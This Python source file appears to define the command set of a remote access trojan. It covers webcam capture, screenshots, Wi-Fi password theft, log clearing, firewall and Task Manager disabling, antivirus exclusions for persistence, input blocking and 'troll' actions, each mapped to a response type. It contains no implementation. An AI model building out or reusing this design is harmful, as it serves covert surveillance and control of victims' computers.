from enum import Enum

class Command(Enum):
    # File System Commands
    DOWNLOAD_FILE_HTTP = "DOWNLOAD_FILE_HTTP"
    DOWNLOAD_RUN_EXE = "DOWNLOAD_RUN_EXE"
    LISTDIR = "LISTDIR"
    GET_START_UP_CONTENTS = "GET_START_UP_CONTENTS"
    CHDIR = "CHDIR"
    GETCWD = "GETCWD"
    LIST_CURRENT_DIRECTORY = "LIST_CURRENT_DIRECTORY"
    DELETE_FILE = "DELETE_FILE"
    DELETE_FOLDER = "DELETE_FOLDER"
    MAKE_DIRECTORY = "MAKE_DIRECTORY"
    SPAM_FOLDERS = "SPAM_FOLDERS"
    MAKE_SHORTCUT = "MAKE_SHORTCUT"
    MOVE_FILE = "MOVE_FILE"
    # Input/Output Commands
    REVERSE_MOUSE_BUTTON = "REVERSE_MOUSE_BUTTON"
    BLOCK_ALL_INPUT = "BLOCK_ALL_INPUT"
    UNBLOCK_ALL_INPUT = "UNBLOCK_ALL_INPUT"
    BLOCK_MOUSE = "BLOCK_MOUSE"
    UNBLOCK_MOUSE = "UNBLOCK_MOUSE"
    BLOCK_MOUSE_SECONDS = "BLOCK_MOUSE_SECONDS"
    BLOCK_ALL_SECONDS = "BLOCK_ALL_SECONDS"
    BLOCK_SMART_SECONDS = "BLOCK_SMART_SECONDS"
    GET_CLIPBOARD = "GET_CLIPBOARD"
    PASTE_TO_CLIPBOARD = "PASTE_TO_CLIPBOARD"
    CLIPBOARD_FILLER = "CLIPBOARD_FILLER"
    FILLER_OFF = "FILLER_OFF"
    GET_FOREGROUND_WINDOW_TITLE = "GET_FOREGROUND_WINDOW_TITLE"
    STOP_DISABLER = "STOP_DISABLER"
    DISABLE_CURRENT_WINDOWS_CONTINOUS = "DISABLE_CURRENT_WINDOWS_CONTINOUS"
    ENABLE_CURRENT_WINDOW = "ENABLE_CURRENT_WINDOW"
    DISABLE_CURRENT_WINDOW = "DISABLE_CURRENT_WINDOW"

    # Surveillance Commands
    SCREENSHOT = "SCREENSHOT"
    GET_AVAILABLE_DEVICES = "GET_AVAILABLE_DEVICES"
    START_CAMERA = "START_CAMERA"

    # System Commands
    CREATE_ACCOUNT = "CREATE_ACCOUNT"
    GET_ACCOUNTS = "GET_ACCOUNTS"
    DISABLE_CMD_FULLY = "DISABLE_CMD_FULLY"
    DISABLE_CMD = "DISABLE_CMD"
    ENABLE_CMD = "ENABLE_CMD"
    FIREWALL_ON = "FIREWALL_ON"
    FIREWALL_OFF = "FIREWALL_OFF"
    GET_CPU_USAGE = "GET_CPU_USAGE"
    GET_RAM_USAGE_INFO = "GET_RAM_USAGE_INFO"
    GET_DISK_USAGE_INFO = "GET_DISK_USAGE_INFO"
    GET_DISK_INFO = "GET_DISK_INFO"
    GET_HOSTFILE_CONTENTS = "GET_HOSTFILE_CONTENTS"
    WRITE_HOSTFILE_CONTENTS = "WRITE_HOSTFILE_CONTENTS"
    GET_INSTALLED_PROGRAMS = "GET_INSTALLED_PROGRAMS"
    RUN_UNINSTALLER = "RUN_UNINSTALLER"
    ENABLE_INTERNET = "ENABLE_INTERNET"
    DISABLE_INTERNET = "DISABLE_INTERNET"
    CLEAR_LOGS = "CLEAR_LOGS"
    GET_ADAPTER_STATS = "GET_ADAPTER_STATS"
    GET_ADAPTERS = "GET_ADAPTERS"
    GET_DEVICES_ON_NETWORK = "GET_DEVICES_ON_NETWORK"
    GET_WIFI_NETWORKS_WINDOWS = "GET_WIFI_NETWORKS_WINDOWS"
    GET_WIFI_PASSWORDS_WINDOWS = "GET_WIFI_PASSWORDS_WINDOWS"
    GET_IP_INFO = "GET_IP_INFO"
    GET_COUNTRY = "GET_COUNTRY"
    GET_PUBLIC_IP = "GET_PUBLIC_IP"
    MINIMIZE_ALL_WINDOWS = "MINIMIZE_ALL_WINDOWS"
    FREEZE_PC = "FREEZE_PC"
    LOGOUT = "LOGOUT"
    RESTART = "RESTART"
    SHUTDOWN = "SHUTDOWN"
    KILL_PROCESS = "KILL_PROCESS"
    GET_PROCESSES = "GET_PROCESSES"
    GEO_LOCATE = "GEO_LOCATE"
    GET_USERNAME = "GET_USERNAME"
    GET_UPTIME = "GET_UPTIME"
    GET_SYSTEM_INFO = "GET_SYSTEM_INFO"
    ENABLE_TASKMANAGER = "ENABLE_TASKMANAGER"
    DISABLE_TASKMANAGER = "DISABLE_TASKMANAGER"

    # Troll Commands
    SHOW_MESSAGE_BOX = "SHOW_MESSAGE_BOX"
    RUN_TROLL_SCRIPT = "RUN_TROLL_SCRIPT"
    OPEN_CAMERA_APP = "OPEN_CAMERA_APP"
    CHANGE_WALLPAPER_HTTP = "CHANGE_WALLPAPER_HTTP"
    EJECT_CD = "EJECT_CD"
    EJECT_CD_CONTINOUS = "EJECT_CD_CONTINOUS"
    STOP_CD_EJECTOR = "STOP_CD_EJECTOR"
    TYPE_MESSAGE_NOTEPAD = "TYPE_MESSAGE_NOTEPAD"
    SHOW_WEBSITE = "SHOW_WEBSITE"

    # Persistence Commands
    ADD_EXTENSION_EXCLUSION = "ADD_EXTENSION_EXCLUSION"
    REMOVE_EXTENSION_EXCLUSION = "REMOVE_EXTENSION_EXCLUSION"
    ADD_FOLDER_EXCLUSION = "ADD_FOLDER_EXCLUSION"
    REMOVE_FOLDER_EXCLUSION = "REMOVE_FOLDER_EXCLUSION"

class ResponseType(Enum):
    FILE_RESPONSE = "FILE_RESPONSE"
    STREAM = "STREAM"
    JSON_RESPONSE = "JSON_RESPONSE"
    
    
command_response_map = {
    # File System Commands
    Command.DOWNLOAD_FILE_HTTP: ResponseType.FILE_RESPONSE,
    Command.DOWNLOAD_RUN_EXE: ResponseType.JSON_RESPONSE,
    Command.LISTDIR: ResponseType.JSON_RESPONSE,
    Command.GET_START_UP_CONTENTS: ResponseType.JSON_RESPONSE,
    Command.CHDIR: ResponseType.JSON_RESPONSE,
    Command.GETCWD: ResponseType.JSON_RESPONSE,
    Command.LIST_CURRENT_DIRECTORY: ResponseType.JSON_RESPONSE,
    Command.DELETE_FILE: ResponseType.JSON_RESPONSE,
    Command.DELETE_FOLDER: ResponseType.JSON_RESPONSE,
    Command.MAKE_DIRECTORY: ResponseType.JSON_RESPONSE,
    Command.MAKE_DIRECTORY: ResponseType.JSON_RESPONSE,
    Command.SPAM_FOLDERS: ResponseType.JSON_RESPONSE,
    Command.MAKE_SHORTCUT: ResponseType.JSON_RESPONSE,
    Command.MOVE_FILE: ResponseType.JSON_RESPONSE,

    # Input/Output Commands
    Command.REVERSE_MOUSE_BUTTON: ResponseType.JSON_RESPONSE,
    Command.BLOCK_ALL_INPUT: ResponseType.JSON_RESPONSE,
    Command.UNBLOCK_ALL_INPUT: ResponseType.JSON_RESPONSE,
    Command.BLOCK_MOUSE: ResponseType.JSON_RESPONSE,
    Command.UNBLOCK_MOUSE: ResponseType.JSON_RESPONSE,
    Command.BLOCK_MOUSE_SECONDS: ResponseType.JSON_RESPONSE,
    Command.BLOCK_ALL_SECONDS: ResponseType.JSON_RESPONSE,
    Command.BLOCK_SMART_SECONDS: ResponseType.JSON_RESPONSE,
    Command.GET_CLIPBOARD: ResponseType.JSON_RESPONSE,
    Command.PASTE_TO_CLIPBOARD: ResponseType.JSON_RESPONSE,
    Command.CLIPBOARD_FILLER: ResponseType.JSON_RESPONSE,
    Command.FILLER_OFF: ResponseType.JSON_RESPONSE,
    Command.GET_FOREGROUND_WINDOW_TITLE: ResponseType.JSON_RESPONSE,
    Command.STOP_DISABLER: ResponseType.JSON_RESPONSE,
    Command.DISABLE_CURRENT_WINDOWS_CONTINOUS: ResponseType.JSON_RESPONSE,
    Command.ENABLE_CURRENT_WINDOW: ResponseType.JSON_RESPONSE,
    Command.DISABLE_CURRENT_WINDOW: ResponseType.JSON_RESPONSE,

    # Surveillance Commands
    Command.SCREENSHOT: ResponseType.FILE_RESPONSE,
    Command.GET_AVAILABLE_DEVICES: ResponseType.JSON_RESPONSE,
    Command.START_CAMERA: ResponseType.STREAM,

    # System Commands
    # Assuming JSON_RESPONSE for informational commands and FILE_RESPONSE for any commands that result in downloads
    Command.CREATE_ACCOUNT: ResponseType.JSON_RESPONSE,
    Command.GET_ACCOUNTS: ResponseType.JSON_RESPONSE,
    Command.DISABLE_CMD_FULLY: ResponseType.JSON_RESPONSE,
    Command.ENABLE_CMD: ResponseType.JSON_RESPONSE,
    Command.FIREWALL_ON: ResponseType.JSON_RESPONSE,
    Command.FIREWALL_OFF: ResponseType.JSON_RESPONSE,
    Command.GET_CPU_USAGE: ResponseType.JSON_RESPONSE,
    Command.GET_RAM_USAGE_INFO: ResponseType.JSON_RESPONSE,
    Command.GET_DISK_USAGE_INFO: ResponseType.JSON_RESPONSE,
    Command.GET_DISK_INFO: ResponseType.JSON_RESPONSE,
    Command.GET_HOSTFILE_CONTENTS: ResponseType.JSON_RESPONSE,
    Command.WRITE_HOSTFILE_CONTENTS: ResponseType.JSON_RESPONSE,
    Command.GET_INSTALLED_PROGRAMS: ResponseType.JSON_RESPONSE,
    Command.RUN_UNINSTALLER: ResponseType.JSON_RESPONSE,
    Command.ENABLE_INTERNET: ResponseType.JSON_RESPONSE,
    Command.DISABLE_INTERNET: ResponseType.JSON_RESPONSE,
    Command.CLEAR_LOGS: ResponseType.JSON_RESPONSE,
    Command.GET_ADAPTER_STATS: ResponseType.JSON_RESPONSE,
    Command.GET_ADAPTERS: ResponseType.JSON_RESPONSE,
    Command.GET_DEVICES_ON_NETWORK: ResponseType.JSON_RESPONSE,
    Command.GET_WIFI_NETWORKS_WINDOWS: ResponseType.JSON_RESPONSE,
    Command.GET_WIFI_PASSWORDS_WINDOWS: ResponseType.FILE_RESPONSE,
    Command.GET_IP_INFO: ResponseType.JSON_RESPONSE,
    Command.GET_COUNTRY: ResponseType.JSON_RESPONSE,
    Command.GET_PUBLIC_IP: ResponseType.JSON_RESPONSE,
    Command.MINIMIZE_ALL_WINDOWS: ResponseType.JSON_RESPONSE,
    Command.FREEZE_PC: ResponseType.JSON_RESPONSE,
    Command.LOGOUT: ResponseType.JSON_RESPONSE,
    Command.RESTART: ResponseType.JSON_RESPONSE,
    Command.SHUTDOWN: ResponseType.JSON_RESPONSE,
    Command.KILL_PROCESS: ResponseType.JSON_RESPONSE,
    Command.GET_PROCESSES: ResponseType.JSON_RESPONSE,
    Command.GEO_LOCATE: ResponseType.JSON_RESPONSE,
    Command.GET_USERNAME: ResponseType.JSON_RESPONSE,
    Command.GET_UPTIME: ResponseType.JSON_RESPONSE,
    Command.GET_SYSTEM_INFO: ResponseType.JSON_RESPONSE,
    Command.ENABLE_TASKMANAGER: ResponseType.JSON_RESPONSE,
    Command.DISABLE_TASKMANAGER: ResponseType.JSON_RESPONSE,

    # Troll Commands
    Command.SHOW_MESSAGE_BOX: ResponseType.JSON_RESPONSE,
    Command.RUN_TROLL_SCRIPT: ResponseType.JSON_RESPONSE,
    Command.OPEN_CAMERA_APP: ResponseType.JSON_RESPONSE,
    Command.CHANGE_WALLPAPER_HTTP: ResponseType.JSON_RESPONSE,
    Command.EJECT_CD: ResponseType.JSON_RESPONSE,
    Command.EJECT_CD_CONTINOUS: ResponseType.JSON_RESPONSE,
    Command.STOP_CD_EJECTOR: ResponseType.JSON_RESPONSE,
    Command.TYPE_MESSAGE_NOTEPAD: ResponseType.JSON_RESPONSE,
    Command.SHOW_WEBSITE: ResponseType.JSON_RESPONSE,

    # Persistence Commands
    Command.ADD_EXTENSION_EXCLUSION: ResponseType.JSON_RESPONSE,
    Command.REMOVE_EXTENSION_EXCLUSION: ResponseType.JSON_RESPONSE,
    Command.ADD_FOLDER_EXCLUSION: ResponseType.JSON_RESPONSE,
    Command.REMOVE_FOLDER_EXCLUSION: ResponseType.JSON_RESPONSE,
}